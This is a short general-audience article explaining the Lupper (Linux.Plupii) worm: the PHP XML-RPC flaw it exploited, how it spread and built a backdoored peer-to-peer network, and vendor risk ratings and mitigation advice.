Lupper Worm 101

Malicious coders are very persistent these days. Windows is no longer alone in being attacked, as they have recently learned to exploit systems such as the Mac OS X and Linux, platforms known for their high-level of security. Many of them have been virus programs that take advantage of vulnerabilities in XML-RPC for PHP, a widely used open-source component found in many web-based applications. 

Applications vulnerable to the newer viral strains are b2evolution, Drupal, PHPGroupWare, PostNuke, Tiki Wiki, WordPress and Xoops. While most of these applications have been updated to address the vulnerabilities, un-patched Linux systems remain vulnerable to Linux.Plupii, more commonly termed as the Lupper worm.

How the Worm Functions

The Lupper worm spreads by exploiting Apache web servers using PHP/CGI scripts, a programming language known to be more vulnerable than others. This infection is said to be a variant of the Linux Slapper and BSD Scalper worms due to similar propagation techniques. It attacks a web server by transmitting malicious HTTP (Hypertext Transfer Protocol) requests to open ports. The worm downloads and executes itself when the targeted server is running vulnerable scripts at a particular URL. This is enabled by configurations that permit remote file downloads in PHP/CGI and external shell commands. It's most alarming function involves creating a backdoor on the compromised server. The worm then generates URLs, which initiates a scan to seek out other machines for infection. Additionally, the Lupper worm has the ability to harvest email addresses as well.

Protecting against the Lupper Worm

Lupper was spotted rather quickly and doesn't seem to be spreading at the rate of the Slapper worm. Being that worm exploits on the Linux system are rare in comparison to the Windows environment, security experts suggest that this malicious program is worth keeping an eye on.  Representatives from McAfee state that Lupper's intent of infection is to form a global network of compromised machines based on the peer-to-peer communication principle. This creates a robust network capable of distributing DDoS (distributed denial-of-service) attacks and other exploits because of its remote command. The security vendor also fears that the worms ability to extract email addresses may lead to new methods of infection.

The good thing is that most large corporations aren't running applications scripted in PHP/CGI. What may pose a continuous threat are unofficial sites established from within an or outside of an organization and web hosting companies that use a variety of different scripts. Since the Lupper worm seems to use an IP-based method of propagation, it is less likely that it will locate servers using vulnerable scripts, limiting the chance of infection. This worm would be much more difficult to contain if it was distributed via infected hosts found in the results of a search engine, a common trait of Windows-based malware.

Security experts have recommended many ways to deal with this infection; one is to only grant trusted users access to an FTP server. Symantec Corporation reports the Lupper worm as having a medium level of damage and distribution rate. McAfee labeled it as a low-risk threat for both home and corporate users.

Log in or sign up to comment.

Post a comment

Log in or sign up to comment.

With the advent of wireless Internet, more and more computer users are entering the world of cyber space.

Yet, while these users are well aware of the importance of the protection of their computer when hooked up to regular internet providers, they are often oblivious to the fact that the same cyber dangers, and in fact even more, exist in the world of WiFi.

What you may not know is that same Internet connection that makes it possible to check your email from the comfort of your bed also makes it easier for hackers to access your personal information.

It is for this reason, the sharing of the wireless Internet connection, that protecting your computer when wireless is even more important than ever before.